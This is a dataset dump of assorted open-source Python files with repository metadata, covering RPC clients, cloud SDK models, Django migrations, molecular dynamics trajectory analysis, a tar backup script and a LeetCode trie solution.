self.l.append(item_c_2())
c = container_c()
print("Model: " + ModelPrettyPrinter.print(c.get_model()))
for i in range(100):
c.randomize()
self.assertEqual(10, len(c.l))
for i,it in enumerate(c.l):
if i%2 == 0:
self.assertLess(it.a, it.b)
else:
self.assertGreater(it.a, it.b)
|
[
"[email protected]"
] | |
8083d6ab3311a0ec517636a91fd33a22445421bd
|
7fa15c4dbca224aed616e76074bf017699af00df
|
/examples/sum_client.py
|
0011bc63474cfec50e1d633ae091f99a0ddb1f0e
|
[
"Apache-2.0"
] |
permissive
|
studio-ousia/mprpc
|
cc272e650b46a21997c680cf00e5ccbc015dc709
|
6076f68a16f78e0010307344afa253e0956f2a9d
|
refs/heads/master
| 2023-01-14T02:33:22.171728 | 2022-12-27T07:13:23 | 2022-12-27T07:13:23 | 13,551,567 | 170 | 60 |
NOASSERTION
| 2023-02-18T15:15:10 | 2013-10-14T03:15:41 |
Cython
|
UTF-8
|
Python
| false | false | 595 |
py
|
# -*- coding: utf-8 -*-
import gsocketpool.pool
import gevent.pool
from mprpc import RPCClient, RPCPoolClient
def call():
client = RPCClient('127.0.0.1', 6000)
    print(client.call('sum', 1, 2))
def call_using_pool():
options = dict(host='127.0.0.1', port=6000)
client_pool = gsocketpool.pool.Pool(RPCPoolClient, options)
def _call(n):
with client_pool.connection() as client:
return client.call('sum', 1, 2)
glet_pool = gevent.pool.Pool(10)
    print([result for result in glet_pool.imap_unordered(_call, range(10))])
call()
call_using_pool()
|
[
"[email protected]"
] | |
530d9a1a9c81e48861a573078a5fcca53d28e741
|
e4ec5b6cf3cfe2568ef0b5654c019e398b4ecc67
|
/azure-cli/2.0.18/libexec/lib/python3.6/site-packages/azure/mgmt/network/v2017_06_01/models/network_interface_association.py
|
56f1d3b0eda3f4acd5b0007f57df14bfd8f42f49
|
[] |
no_license
|
EnjoyLifeFund/macHighSierra-cellars
|
59051e496ed0e68d14e0d5d91367a2c92c95e1fb
|
49a477d42f081e52f4c5bdd39535156a2df52d09
|
refs/heads/master
| 2022-12-25T19:28:29.992466 | 2017-10-10T13:00:08 | 2017-10-10T13:00:08 | 96,081,471 | 3 | 1 | null | 2022-12-17T02:26:21 | 2017-07-03T07:17:34 | null |
UTF-8
|
Python
| false | false | 1,281 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class NetworkInterfaceAssociation(Model):
"""Network interface and its custom security rules.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Network interface ID.
:vartype id: str
:param security_rules: Collection of custom security rules.
:type security_rules: list of :class:`SecurityRule
<azure.mgmt.network.v2017_06_01.models.SecurityRule>`
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'security_rules': {'key': 'securityRules', 'type': '[SecurityRule]'},
}
def __init__(self, security_rules=None):
self.id = None
self.security_rules = security_rules
|
[
"[email protected]"
] | |
40704cee49a3949e9dcf543e0695bacb829c017f
|
e885c02621101ea646c9dcc3e934dd7ceaaf4f04
|
/djangocms_disqus/migrations/0001_initial.py
|
7be273f44c0b09ed5f6447a8d57db12cadbb0691
|
[
"BSD-3-Clause"
] |
permissive
|
mishbahr/djangocms-disqus
|
40421d6662ef911542287fc0c2e8b81a63e49667
|
49e75a024e2ca1c932a8b9134500c2f24137a153
|
refs/heads/master
| 2023-01-05T00:46:39.514178 | 2017-05-23T22:15:12 | 2017-05-23T22:15:12 | 42,411,019 | 21 | 5 |
BSD-3-Clause
| 2022-12-26T19:52:38 | 2015-09-13T20:07:18 |
Python
|
UTF-8
|
Python
| false | false | 1,804 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from connected_accounts.fields import AccountField
from ..conf import settings
class Migration(migrations.Migration):
dependencies = [
('connected_accounts', '__latest__'),
('cms', '__latest__'),
]
operations = [
migrations.CreateModel(
name='Disqus',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('shortname', models.CharField(help_text='Select a website Or register a new one on the Disqus website. https://disqus.com/admin/signup/', max_length=150, verbose_name='Shortname')),
('enable_sso', models.BooleanField(default=False, help_text='Allows users to log in to Disqus via your site.', verbose_name='Enable Single Sign-On')),
('load_event', models.CharField(default=settings.DJANGOCMS_DISQUS_LOADING_CHOICES[0][0], max_length=100, verbose_name='Load Disqus', choices=settings.DJANGOCMS_DISQUS_LOADING_CHOICES)),
('site_name', models.CharField(help_text='Used for the SSO login button.', max_length=100, verbose_name='Site Name', blank=True)),
('button_text', models.CharField(help_text='By default it will be "Load Comments..."', max_length=100, verbose_name='Button Text', blank=True)),
('account', AccountField(verbose_name='Connected Account', to='connected_accounts.Account', provider='disqus', help_text='Select a connected Disqus account or connect to a new account.')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
]
|
[
"[email protected]"
] | |
3a79fc6c3eb34308f2013497b29f90ad59a89e7b
|
fc85a54686e13e598541df14c472e8aa744e6713
|
/petisco/extra/sqlalchemy/sql/mysql/mysql_connection.py
|
ccf69974f1b0fbfe9c880d72c61912564fc1f72c
|
[
"MIT"
] |
permissive
|
alice-biometrics/petisco
|
63721751cd43e70825b161a5ece535c80d95b6fa
|
771ebe5c69dc735b8f373c2e7303d3b4eb655044
|
refs/heads/main
| 2023-09-01T03:53:23.642042 | 2023-08-25T05:38:42 | 2023-08-25T05:38:42 | 217,555,512 | 42 | 2 |
MIT
| 2023-09-12T11:06:43 | 2019-10-25T14:48:10 |
Python
|
UTF-8
|
Python
| false | false | 1,700 |
py
|
import os
MYSQL_DATABASE_DEFAULT = "mysql_test"
class MySqlConnection:
def __init__(
self,
server_name: str,
driver: str,
user: str,
password: str,
host: str,
port: str,
database_name: str,
url: str,
):
self.server_name = server_name
self.driver = driver
self.user = user
self.password = password
self.host = host
self.port = port
self.database_name = database_name
self.url = url
@staticmethod
def create(
server_name: str = "mysql",
driver: str = "pymysql",
user: str = "root",
password: str = "root",
host: str = "mysql",
port: str = "3306",
database_name: str = MYSQL_DATABASE_DEFAULT,
) -> "MySqlConnection":
url = (
f"{server_name}+{driver}://{user}:{password}@{host}:{port}/{database_name}"
)
return MySqlConnection(
server_name, driver, user, password, host, port, database_name, url
)
@staticmethod
def create_local(database_name: str = MYSQL_DATABASE_DEFAULT) -> "MySqlConnection":
return MySqlConnection.create(
host="localhost", port="3307", database_name=database_name
)
@staticmethod
def from_environ() -> "MySqlConnection":
return MySqlConnection.create(
"mysql",
"pymysql",
os.getenv("MYSQL_USER", "root"),
os.getenv("MYSQL_PASSWORD", "root"),
os.getenv("MYSQL_HOST", "mysql"),
os.getenv("MYSQL_PORT", "3306"),
os.getenv("MYSQL_DATABASE", MYSQL_DATABASE_DEFAULT),
)
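# Editorial usage sketch (not part of the original module): with the defaults
# above, create() yields a SQLAlchemy-style connection URL.
if __name__ == "__main__":
    connection = MySqlConnection.create()
    print(connection.url)  # mysql+pymysql://root:root@mysql:3306/mysql_test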
|
[
"[email protected]"
] | |
5e92281f35cff75f5d8fd68958f6faad390bb658
|
1711a28e01e40c0164be23536ff109c428f3dd8c
|
/SUMO_compound_mdtraj_analysis.py
|
6d5a65145a08e70043aae6c8b2f867f060261593
|
[] |
no_license
|
sunhuaiyu/mdtraj
|
adafd4b4408b688f23fed659e8fbaefd4ff1bd42
|
d626841025e9f9411e988cee6631edcbf171499d
|
refs/heads/master
| 2020-05-07T20:28:33.381621 | 2019-05-02T00:00:02 | 2019-05-02T00:00:02 | 180,862,388 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,277 |
py
|
import numpy as np
import matplotlib.pyplot as plt
import mdtraj as md
from glob import glob
from multiprocessing import Pool
from matplotlib.gridspec import GridSpec
def SUMO_ligand_dist(tr):
#coordinates for the Cgamma of SUMO1_F36, SUMO2_F31, or SUMO3_F31:
select_str = '(resname==PHE and (resid==15 or resid==30 or resid==17)) and (name==CG)'
atom_ix = tr.topology.select(select_str)[0]
a = tr.xyz[:, atom_ix]
# ligand all atom coordinatess:
lig = tr.atom_slice(tr.topology.select('chainid==1'))
# ligand center of mass:
b = md.compute_center_of_mass(lig)
# distance between K37/K32_CA and ligand center of mass:
return (((a - b) ** 2).sum(1)) ** 0.5
# read trajectory file in HDF5 format (*.h5), compute SUMO_ligand_dist
def name2traj(file_name):
tr = md.load(file_name)
if tr.n_frames > 10000:
tr = tr[::10]
return tr
# given trajectory file name in HDF5 format, plot SUMO_ligand_dist
def plot_dist(traj_name):
plt.plot(SUMO_ligand_dist(name2traj(traj_name)), linewidth=1)
plt.ylim(0, 4.5)
title = traj_name.split('.')[0]
plt.title(title)
plt.savefig(title + '.jpg', dpi=600)
plt.close()
# calculate fraction of frames where the distance is less than a cut-off
compound = ['PHG00686', 'SEW05414', 'HTS12268', 'BTB13496']
compound2traj_name = {i: glob('SUMO1_2uyz_{}_F*_5000ns.h5'.format(i)) for i in compound}
traj_files = sum(compound2traj_name.values(), [])  # flatten the per-compound lists into one list
# traj_dict contains all loaded trajectories
# dist_dict contains all calculated distances;
# accelerate calculation with multiprocessing
def D(file_name):
tr = name2traj(file_name)
d = SUMO_ligand_dist(tr)
return [tr, d]
DD = Pool(48).map(D, traj_files)
traj_dict = {i[0]:i[1][0] for i in zip(traj_files, DD)}
dist_dict = {i[0]:i[1][1] for i in zip(traj_files, DD)}
# distance (nm) threshold
T = 0.7
# calculate the fraction of trajectories with compound at SIM-binding site
for cp in compound:
all_dist = np.array([dist_dict[i] for i in compound2traj_name[cp]]).ravel()
bound_frames, total_frames = sum(all_dist < T), len(all_dist)
fraction = bound_frames/total_frames
print(cp, round(fraction, 3), total_frames//1000)
# plotting: stack all distance plot together for each compound
for cp in compound:
n = len(compound2traj_name[cp])
fig, axs = plt.subplots(nrows=n, ncols=1, sharex=True)
fig.set_figheight(n)
fig.set_figwidth(4)
axs[0].set_title(cp)
for i in np.arange(n):
dc = dist_dict['SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)]
bound = dc < T
unbound = np.invert(bound)
length = dc.shape[0]
axs[i].plot(np.arange(length)[unbound], dc[unbound],
'C1.', markersize=0.5, alpha=0.6)
axs[i].plot(np.arange(length)[bound], dc[bound],
'C0.', markersize=0.5, alpha=0.6)
axs[i].set_ylim(0, 4.5)
fig.subplots_adjust(hspace=0)
fig.savefig('SUMO1_2uyz_{}_dist_all_traj.jpg'.format(cp),
dpi=600, bbox_inches='tight')
# extract a centroid frame from each traj ending with significant binding;
# for each compound, superpose all centroids along the SIM-binding pocket
# and save as one pdb file
centroids = {cp:[] for cp in compound}
for cp in compound:
n = len(compound2traj_name[cp])
for i in np.arange(n):
file_name = 'SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)
dc = dist_dict[file_name]
bound = dc < T
if sum(bound) > 1000:
tr = traj_dict[file_name][bound]
protein_atoms = tr.topology.select('residue 32 to 56')
compound_atoms = tr.topology.select('chainid==1')
atoms_ix = np.concatenate((protein_atoms, compound_atoms))
tr.superpose(tr, frame=0, atom_indices=atoms_ix)
m = np.empty((tr.n_frames, tr.n_frames)) # rmsd matrix
for i in range(tr.n_frames):
m[i] = md.rmsd(tr, tr, i, atom_indices=atoms_ix)
#compute the centroid frame: the one closest to mean frame
centroid_ix = np.exp(-m/m.std()).sum(1).argmax()
centroids[cp].append(tr[centroid_ix])
print(file_name)
centroids_tr = md.join(centroids[cp])
centroids_tr.superpose(centroids_tr, frame=0, atom_indices=protein_atoms)
centroids_tr.save_pdb('SUMO1_2uyz_{}_bound_centroids.pdb'.format(cp))
# compute RMSD among bound_centroids
from scipy.spatial.distance import squareform
for cp in compound:
tr = md.load('SUMO1_2uyz_{}_bound_centroids.pdb'.format(cp))
    m = np.array([md.rmsd(tr, tr, i, atom_indices=protein_atoms) for i in range(len(tr))])
m = squareform(m, checks=False)
print(cp, min(m), max(m))
# compute atomic distances
T = 0.7
tr2uyz = md.join([md.load('SUMO1_2uyz_{}_400ns.h5'.format(i+1)) for i in range(12)])
cp = 'PHG00686'
d = [dist_dict['SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)] for i in range(12)]
tr1cp = md.join([traj_dict['SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)][d[i] < T] for i in range(12)])
def atom_pair_dist3(cp, pair='F36CG_R54CZ'):
top = tr2uyz[0].topology
s = pair.split('_')
pair_ix = top.select_pairs('residue=={0} and name=={1}'.format(s[0][1:3], s[0][3:]),
'residue=={0} and name=={1}'.format(s[1][1:3], s[1][3:]))
dist2uyz = md.compute_distances(tr2uyz, atom_pairs=pair_ix, periodic=False)
dist1cp = md.compute_distances(tr1cp, atom_pairs=pair_ix, periodic=False)
fig = plt.figure(figsize=(10, 4.8))
gs = GridSpec(1, 2, width_ratios=[2, 1])
ax0, ax1 = plt.subplot(gs[0]), plt.subplot(gs[1])
ax0.plot(dist2uyz, 'C1.', markersize=1)
ax0.plot(dist1cp, 'C0.', markersize=1, alpha=0.5)
ax0.tick_params(labelsize=15)
ax1.hist(dist2uyz, color='C1', bins=100, linewidth=1,
orientation='horizontal')
ax1.hist(dist1cp, color='C0', alpha=0.6, bins=100, linewidth=1,
orientation='horizontal')
ax1.tick_params(labelsize=15)
ax1.legend(['no compound', 'with {}'.format(cp)], fontsize=15, frameon=0)
fig.tight_layout()
fig.savefig('SUMO1_2uyz_{0}_dist_{1}.jpg'.format(cp, pair), dpi=600)
|
[
"[email protected]"
] | |
47b910274ca6546bd96488e2c3027896b833a188
|
7abd8bbbba8f401c4ce9d9ec550a0cae4a6f19ed
|
/bingads/v12/bulk/entities/__init__.py
|
afc5d3d8bf175347a50c466420cd874f00447f89
|
[
"MIT"
] |
permissive
|
stevenblanton/BingAds-Python-SDK
|
fd2f119db51e1a91962aa5ee4bb86344e58078a8
|
5b6e6499ae1dcc6fb8ba3032ad1a2b6ee63705c9
|
refs/heads/master
| 2020-09-05T12:11:04.168580 | 2019-11-01T15:49:08 | 2019-11-01T15:49:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 909 |
py
|
__author__ = 'Bing Ads SDK Team'
__email__ = '[email protected]'
from .common import *
from .bulk_error import *
from .bulk_entity import *
from .bid_suggestion_data import *
from .unknown_bulk_entity import *
from .bulk_account import *
from .bulk_budget import *
from .bulk_campaign import *
from .bulk_ad_group import *
from .bulk_keyword import *
from .bulk_campaign_product_scope import *
from .bulk_ad_group_product_partition import *
from .bulk_campaign_negative_dynamic_search_ad_target import *
from .bulk_ad_group_dynamic_search_ad_target import *
from .bulk_ad_group_negative_dynamic_search_ad_target import *
from .ad_extensions import *
from .bulk_ads import *
from .bulk_negative_keywords import *
from .bulk_negative_sites import *
from .audiences import *
from .target_criterions import *
from .labels import *
from .bulk_offline_conversion import *
from .bulk_experiment import *
|
[
"[email protected]"
] | |
61a49f9ce140730c3fb6b664ca5ac5bc8085cfb0
|
6fa701cdaa0d83caa0d3cbffe39b40e54bf3d386
|
/google/ads/googleads/v6/googleads-py/google/ads/googleads/v6/services/types/media_file_service.py
|
d18d6a8d09b03c92f8310398e3c6a6a1be1ac137
|
[
"Apache-2.0"
] |
permissive
|
oltoco/googleapis-gen
|
bf40cfad61b4217aca07068bd4922a86e3bbd2d5
|
00ca50bdde80906d6f62314ef4f7630b8cdb6e15
|
refs/heads/master
| 2023-07-17T22:11:47.848185 | 2021-08-29T20:39:47 | 2021-08-29T20:39:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,355 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v6.enums.types import response_content_type as gage_response_content_type
from google.ads.googleads.v6.resources.types import media_file as gagr_media_file
from google.rpc import status_pb2 # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v6.services',
marshal='google.ads.googleads.v6',
manifest={
'GetMediaFileRequest',
'MutateMediaFilesRequest',
'MediaFileOperation',
'MutateMediaFilesResponse',
'MutateMediaFileResult',
},
)
class GetMediaFileRequest(proto.Message):
r"""Request message for
[MediaFileService.GetMediaFile][google.ads.googleads.v6.services.MediaFileService.GetMediaFile]
Attributes:
resource_name (str):
Required. The resource name of the media file
to fetch.
"""
resource_name = proto.Field(
proto.STRING,
number=1,
)
class MutateMediaFilesRequest(proto.Message):
r"""Request message for
[MediaFileService.MutateMediaFiles][google.ads.googleads.v6.services.MediaFileService.MutateMediaFiles]
Attributes:
customer_id (str):
Required. The ID of the customer whose media
files are being modified.
operations (Sequence[google.ads.googleads.v6.services.types.MediaFileOperation]):
Required. The list of operations to perform
on individual media file.
partial_failure (bool):
If true, successful operations will be
carried out and invalid operations will return
errors. If false, all operations will be carried
out in one transaction if and only if they are
all valid. Default is false.
validate_only (bool):
If true, the request is validated but not
executed. Only errors are returned, not results.
response_content_type (google.ads.googleads.v6.enums.types.ResponseContentTypeEnum.ResponseContentType):
The response content type setting. Determines
whether the mutable resource or just the
resource name should be returned post mutation.
"""
customer_id = proto.Field(
proto.STRING,
number=1,
)
operations = proto.RepeatedField(
proto.MESSAGE,
number=2,
message='MediaFileOperation',
)
partial_failure = proto.Field(
proto.BOOL,
number=3,
)
validate_only = proto.Field(
proto.BOOL,
number=4,
)
response_content_type = proto.Field(
proto.ENUM,
number=5,
enum=gage_response_content_type.ResponseContentTypeEnum.ResponseContentType,
)
class MediaFileOperation(proto.Message):
r"""A single operation to create media file.
Attributes:
create (google.ads.googleads.v6.resources.types.MediaFile):
Create operation: No resource name is
expected for the new media file.
"""
create = proto.Field(
proto.MESSAGE,
number=1,
oneof='operation',
message=gagr_media_file.MediaFile,
)
class MutateMediaFilesResponse(proto.Message):
r"""Response message for a media file mutate.
Attributes:
partial_failure_error (google.rpc.status_pb2.Status):
Errors that pertain to operation failures in the partial
failure mode. Returned only when partial_failure = true and
all errors occur inside the operations. If any errors occur
outside the operations (e.g. auth errors), we return an RPC
level error.
results (Sequence[google.ads.googleads.v6.services.types.MutateMediaFileResult]):
All results for the mutate.
"""
partial_failure_error = proto.Field(
proto.MESSAGE,
number=3,
message=status_pb2.Status,
)
results = proto.RepeatedField(
proto.MESSAGE,
number=2,
message='MutateMediaFileResult',
)
class MutateMediaFileResult(proto.Message):
r"""The result for the media file mutate.
Attributes:
resource_name (str):
The resource name returned for successful
operations.
media_file (google.ads.googleads.v6.resources.types.MediaFile):
The mutated media file with only mutable fields after
mutate. The field will only be returned when
response_content_type is set to "MUTABLE_RESOURCE".
"""
resource_name = proto.Field(
proto.STRING,
number=1,
)
media_file = proto.Field(
proto.MESSAGE,
number=2,
message=gagr_media_file.MediaFile,
)
__all__ = tuple(sorted(__protobuf__.manifest))
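# Editorial usage sketch (not part of the generated module): proto-plus
# messages such as the ones above accept keyword arguments that mirror the
# field definitions in this file; the customer ID below is a placeholder.
if __name__ == "__main__":
    example_operation = MediaFileOperation(create=gagr_media_file.MediaFile())
    example_request = MutateMediaFilesRequest(
        customer_id="1234567890",
        operations=[example_operation],
        partial_failure=True,
    )
    print(example_request)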
|
[
"bazel-bot-development[bot]@users.noreply.github.com"
] |
bazel-bot-development[bot]@users.noreply.github.com
|
d827d71d9c05c7c9a359841ae13e780b7c1620e1
|
0e0bd9d0082bf71918db9f6c92c2cefd32fd23bd
|
/guild/commands/runs_import.py
|
354c23dc47578e9820036cf0779f49107bcd69fb
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
christabella/guildai
|
b911d9758296503c431b571dc4696a3690f44b3d
|
10d34eb9aa02aa4a374c340e75b5d44d9f3d8a25
|
refs/heads/master
| 2022-12-17T18:34:45.766299 | 2020-08-31T12:42:25 | 2020-08-31T12:42:25 | 294,189,964 | 0 | 0 |
Apache-2.0
| 2020-09-09T18:02:13 | 2020-09-09T18:02:12 | null |
UTF-8
|
Python
| false | false | 2,500 |
py
|
# Copyright 2017-2020 TensorHub, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
import click
from guild import click_util
from . import runs_support
def _ac_archive(**_kw):
return click_util.completion_dir()
def import_params(fn):
click_util.append_params(
fn,
[
runs_support.runs_arg,
click.Argument(("archive",)),
click.Option(
("-m", "--move"),
help="Move imported runs rather than copy.",
is_flag=True,
),
click.Option(
("--copy-resources",),
help="Copy resources for each imported run.",
is_flag=True,
),
runs_support.all_filters,
click.Option(
("-y", "--yes"), help="Do not prompt before importing.", is_flag=True
),
],
)
assert fn.__click_params__[-1].name == "runs", fn.__click_params__
fn.__click_params__[-1].autocompletion = _ac_archive
return fn
@click.command("import")
@import_params
@click.pass_context
@click_util.use_args
@click_util.render_doc
def import_runs(ctx, args):
"""Import one or more runs from `ARCHIVE`.
`ARCHIVE` must be a directory that contains exported runs. Archive
directories can be created using ``guild export``.
You may use ``guild runs list --archive ARCHIVE`` to view runs in
`ARCHIVE`.
By default, resources are NOT copied with each imported run, but
their links are maintained. To copy resources, use
`--copy-resources`.
**WARNING**: Use `--copy-resources` with care as each imported run
will contain a separate copy of each resource!
{{ runs_support.runs_arg }}
If a `RUN` argument is not specified, ``:`` is assumed (all runs
are selected).
{{ runs_support.all_filters }}
"""
from . import runs_impl
runs_impl.import_(args, ctx)
|
[
"[email protected]"
] | |
af0407d686f5be807f2d3d4b938ec56483a3f89e
|
d6b0bc433b260b5d519d73087d5df46aa516fcdd
|
/biobb_adapters/pycompss/biobb_amber/pmemd/pmemd_mdrun.py
|
e94945a6809b7c30cc12c1d92b7e2ea6151423f4
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
bioexcel/biobb_adapters
|
b5442fe953b90be4e66faf3460b4a88a40e6d448
|
3daa84ba83a7951add017dd0f05dc361aa99dfe5
|
refs/heads/master
| 2023-08-14T08:46:39.323257 | 2023-08-02T09:05:21 | 2023-08-02T09:05:21 | 157,351,268 | 0 | 2 |
Apache-2.0
| 2023-04-01T14:56:43 | 2018-11-13T09:07:36 |
Common Workflow Language
|
UTF-8
|
Python
| false | false | 3,420 |
py
|
# Python
import os
import sys
import traceback
# Pycompss
from pycompss.api.task import task
from pycompss.api.parameter import FILE_IN, FILE_OUT
from pycompss.api.multinode import multinode
from pycompss.api.constraint import constraint
# Adapters commons pycompss
from biobb_adapters.pycompss.biobb_commons import task_config
# Wrapped Biobb
from biobb_amber.pmemd.pmemd_mdrun import PmemdMDRun # Importing class instead of module to avoid name collision
task_time_out = int(os.environ.get('TASK_TIME_OUT', 0))
computing_nodes = str(os.environ.get('TASK_COMPUTING_NODES', "1"))
computing_units = str(os.environ.get('TASK_COMPUTING_UNITS', "1"))
gpu_units = str(os.environ.get('TASK_GPU_UNITS', "0"))
@constraint(processors=[{'processorType':'CPU', 'computingUnits':computing_units}, {'processorType':'GPU', 'computingUnits':gpu_units}])
@multinode(computing_nodes=computing_nodes)
@task(input_top_path=FILE_IN, input_crd_path=FILE_IN, output_log_path=FILE_OUT, output_traj_path=FILE_OUT, output_rst_path=FILE_OUT, input_mdin_path=FILE_IN, input_cpin_path=FILE_IN, input_ref_path=FILE_IN, output_cpout_path=FILE_OUT, output_cprst_path=FILE_OUT, output_mdinfo_path=FILE_OUT,
on_failure="IGNORE", time_out=task_time_out)
def _pmemdmdrun(input_top_path, input_crd_path, output_log_path, output_traj_path, output_rst_path, input_mdin_path, input_cpin_path, input_ref_path, output_cpout_path, output_cprst_path, output_mdinfo_path, properties, **kwargs):
task_config.config_multinode(properties)
try:
PmemdMDRun(input_top_path=input_top_path, input_crd_path=input_crd_path, output_log_path=output_log_path, output_traj_path=output_traj_path, output_rst_path=output_rst_path, input_mdin_path=input_mdin_path, input_cpin_path=input_cpin_path, input_ref_path=input_ref_path, output_cpout_path=output_cpout_path, output_cprst_path=output_cprst_path, output_mdinfo_path=output_mdinfo_path, properties=properties, **kwargs).launch()
except Exception as e:
traceback.print_exc()
raise e
finally:
sys.stdout.flush()
sys.stderr.flush()
def pmemd_mdrun(input_top_path, input_crd_path, output_log_path, output_traj_path, output_rst_path, input_mdin_path=None, input_cpin_path=None, input_ref_path=None, output_cpout_path=None, output_cprst_path=None, output_mdinfo_path=None, properties=None, **kwargs):
if (output_log_path is None or (os.path.exists(output_log_path) and os.stat(output_log_path).st_size > 0)) and \
(output_traj_path is None or (os.path.exists(output_traj_path) and os.stat(output_traj_path).st_size > 0)) and \
(output_rst_path is None or (os.path.exists(output_rst_path) and os.stat(output_rst_path).st_size > 0)) and \
(output_cpout_path is None or (os.path.exists(output_cpout_path) and os.stat(output_cpout_path).st_size > 0)) and \
(output_cprst_path is None or (os.path.exists(output_cprst_path) and os.stat(output_cprst_path).st_size > 0)) and \
(output_mdinfo_path is None or (os.path.exists(output_mdinfo_path) and os.stat(output_mdinfo_path).st_size > 0)) and \
True:
print("WARN: Task PmemdMDRun already executed.")
else:
_pmemdmdrun( input_top_path, input_crd_path, output_log_path, output_traj_path, output_rst_path, input_mdin_path, input_cpin_path, input_ref_path, output_cpout_path, output_cprst_path, output_mdinfo_path, properties, **kwargs)
|
[
"[email protected]"
] | |
7be70ac3312c262cb16fc7fdd8dcb45124a48f14
|
d2b2023261ccdcaf560a2e7b0bab13ecdedacfc9
|
/03/fullbackup.py
|
00cb6631683557864d36d5b2b9b06ca824c29799
|
[] |
no_license
|
lilyef2000/lesson
|
a9d96ffc19f68fa3f044f240de6496b6d69394f6
|
2a5abb00b9bbb8bb36602ea6e1e8c464accc0759
|
refs/heads/master
| 2021-01-10T08:41:14.524421 | 2016-01-01T18:04:04 | 2016-01-01T18:04:04 | 46,460,003 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 879 |
py
|
#!/usr/bin/python
import sys,os,time,logger
source_file = sys.argv[1]
formated_source_file = source_file.split('/')[-1]
backup_dir = '/home/Administrator/lesson/backup/'
backup_to_file = '''%s%s_%s.tgz'''% (backup_dir,formated_source_file,time.strftime("%Y%m%d%H%M%S",time.localtime()))
def run_backup(runtime='now',exclude_file_name='None'):
if len(sys.argv) == 4:
        print('--------exclude file mode--------')
if sys.argv[2] == '-X':
exclude_file_name = sys.argv[3]
backup_cmd = "tar -cvzfX %s %s %s " %(backup_to_file,exclude_file_name,source_file)
else:
        print('--------Normal mode:--------')
backup_cmd = "tar -cvzf %s %s |wc -l" %(backup_to_file,source_file)
run_command = os.system(backup_cmd)
if run_command == 0:
logger.record_log('Full Backup','Success','N/A','test')
else:
logger.record_log('Full Backup','Failure','N/A','test')
run_backup()
|
[
"[email protected]"
] | |
c82afac573bf870007f2a26a2677f45d8e51d99c
|
04ae1836b9bc9d73d244f91b8f7fbf1bbc58ff29
|
/1233/solution.py
|
c47461e1a3ab14eb3051ffb577ac9f8ff8d4de5e
|
[] |
no_license
|
zhangruochi/leetcode
|
6f739fde222c298bae1c68236d980bd29c33b1c6
|
cefa2f08667de4d2973274de3ff29a31a7d25eda
|
refs/heads/master
| 2022-07-16T23:40:20.458105 | 2022-06-02T18:25:35 | 2022-06-02T18:25:35 | 78,989,941 | 14 | 6 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,365 |
py
|
from typing import List
class Node():
    def __init__(self, str_):
        self.str_ = str_
    def __eq__(self, other):
        return self.str_ == other.str_
    def __repr__(self):
        return self.str_
    def __hash__(self):
        return hash(self.str_)
    def __call__(self, str_):
        return Node(str_)
class Solution:
def removeSubfolders(self, folder: List[str]) -> List[str]:
trie = {}
res = []
def transfrom(f):
return list(map(Node, f.strip("/").split("/")))
folder = list( map(transfrom, folder))
print(folder)
for f in folder:
trie_pointer = trie
for char in f:
trie_pointer = trie_pointer.setdefault(char, {})
trie_pointer["#"] = "#"
def combine(path):
return "/"+"/".join([str(node) for node in path])
def dfs(trie, path):
nonlocal res
if "#" in trie:
res.append(combine(path))
return
for char in trie:
path.append(char)
dfs(trie[char],path)
path.pop()
dfs(trie, [])
return res
|
[
"[email protected]"
] | |
3259d0615171353e16e44fb0506a5558587028c0
|
d037002f9d2b383ef84686bbb9843dac8ee4bed7
|
/tutorials/Trash/Distributed-DRL/torch/sac_test/utils/environment.py
|
c86069ea34cea9e7eb5b64d4846270b3babd3d96
|
[
"MIT"
] |
permissive
|
ICSL-hanyang/Code_With_RL
|
4edb23ca24c246bb8ec75fcf445d3c68d6c40b6d
|
1378996e6bf6da0a96e9c59f1163a635c20b3c06
|
refs/heads/main
| 2023-08-15T18:37:57.689950 | 2021-10-18T07:31:59 | 2021-10-18T07:31:59 | 392,944,467 | 0 | 0 | null | 2021-08-05T07:20:57 | 2021-08-05T07:20:56 | null |
UTF-8
|
Python
| false | false | 971 |
py
|
import gym
class Environment:
def __init__(self,env_name):
self.env = gym.make(env_name)
